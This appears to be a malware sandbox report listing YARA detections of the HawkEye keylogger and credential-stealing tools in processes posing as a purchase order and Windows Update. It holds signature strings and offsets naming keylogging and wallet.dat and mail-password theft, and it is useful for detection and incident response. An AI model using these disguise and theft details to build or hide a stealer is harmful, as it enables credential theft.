17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0xfd879:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0xffaf7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0xfded6:$string1: HawkEye_Keylogger 0xfed29:$string1: HawkEye_Keylogger 0xffa57:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0xfe2bf:$string2: holdermail.txt 0xfe2df:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0xfe201:$string3: wallet.dat 0xfe219:$string3: wallet.dat 0xfe22f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records
17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x89443:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
17.2.WindowsUpdate.exe.459fbd0.4.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0xfdf2e:$hawkstr1: HawkEye Keylogger 0xfed6f:$hawkstr1: HawkEye Keylogger 0xff09e:$hawkstr1: HawkEye Keylogger 0xff1f9:$hawkstr1: HawkEye Keylogger 0xff35c:$hawkstr1: HawkEye Keylogger 0xff5f3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0xfdaa0:$hawkstr2: Dear HawkEye Customers! 0xff0f1:$hawkstr2: Dear HawkEye Customers! 0xff248:$hawkstr2: Dear HawkEye Customers! 0xff3af:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.409c0d.7.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.41.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.0.NEW PO.exe.408208.41.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.408208.41.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.41.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.408208.41.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.41.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.3ac2370.34.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.42f2370.7.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.16.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.16.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.16.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.16.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.16.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.16.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.45fa72.8.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.45fa72.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.2.WindowsUpdate.exe.45fa72.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.45fa72.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.2.WindowsUpdate.exe.45fa72.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.45fa72.17.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.9.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.17.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.409c0d.1.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.409c0d.24.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.3aa9930.35.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.3aa9930.35.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.22.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.0.NEW PO.exe.408208.22.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.408208.22.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.22.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.408208.22.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.22.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.409c0d.8.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.23.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.2.WindowsUpdate.exe.45fa72.2.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79a59:$key: HawkEyeKeylogger 0x7bcd7:$salt: 099u787978786 0x7a0b6:$string1: HawkEye_Keylogger 0x7af09:$string1: HawkEye_Keylogger 0x7bc37:$string1: HawkEye_Keylogger 0x7a49f:$string2: holdermail.txt 0x7a4bf:$string2: holdermail.txt 0x7a3e1:$string3: wallet.dat 0x7a3f9:$string3: wallet.dat 0x7a40f:$string3: wallet.dat 0x7b7fb:$string4: Keylog Records 0x7bb13:$string4: Keylog Records 0x7bd2f:$string5: do not script --> 0x79a41:$string6: \pidloc.txt 0x79acf:$string7: BSPLIT 0x79adf:$string7: BSPLIT
15.2.WindowsUpdate.exe.402fbd0.5.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
15.2.WindowsUpdate.exe.402fbd0.5.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a10e:$hawkstr1: HawkEye Keylogger 0x7af4f:$hawkstr1: HawkEye Keylogger 0x7b27e:$hawkstr1: HawkEye Keylogger 0x7b3d9:$hawkstr1: HawkEye Keylogger 0x7b53c:$hawkstr1: HawkEye Keylogger 0x7b7d3:$hawkstr1: HawkEye Keylogger 0x79c80:$hawkstr2: Dear HawkEye Customers! 0x7b2d1:$hawkstr2: Dear HawkEye Customers! 0x7b428:$hawkstr2: Dear HawkEye Customers! 0x7b58f:$hawkstr2: Dear HawkEye Customers! 0x79da1:$hawkstr3: HawkEye Logger Details:
15.2.WindowsUpdate.exe.2c2982c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
18.0.WindowsUpdate.exe.400000.21.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.0.WindowsUpdate.exe.400000.21.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.400000.21.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.400000.21.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.400000.21.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.400000.21.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.409c0d.19.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
16.0.WindowsUpdate.exe.409c0d.19.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.409c0d.19.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.409c0d.19.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.409c0d.19.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.45fa72.9.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.9.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.9.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.45fa72.9.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
7.2.NEW PO.exe.45fa72.1.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.16.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
16.0.WindowsUpdate.exe.400000.16.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.400000.16.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.16.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.400000.16.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.16.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
10.0.vbc.exe.400000.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.45fa72.29.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
7.0.NEW PO.exe.45fa72.29.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.29.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.45fa72.29.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
17.2.WindowsUpdate.exe.319982c.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
7.2.NEW PO.exe.3aa9930.8.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.2.NEW PO.exe.3aa9930.8.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.18.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
7.0.NEW PO.exe.408208.18.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.408208.18.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.408208.18.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.408208.18.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.408208.18.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
22.0.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.45fa72.9.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.7c60000.48.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
23.0.vbc.exe.400000.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.3ac2370.47.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.3aa9930.35.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.4.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.4.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.4.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.4.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.4.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.4.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.42f2370.46.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
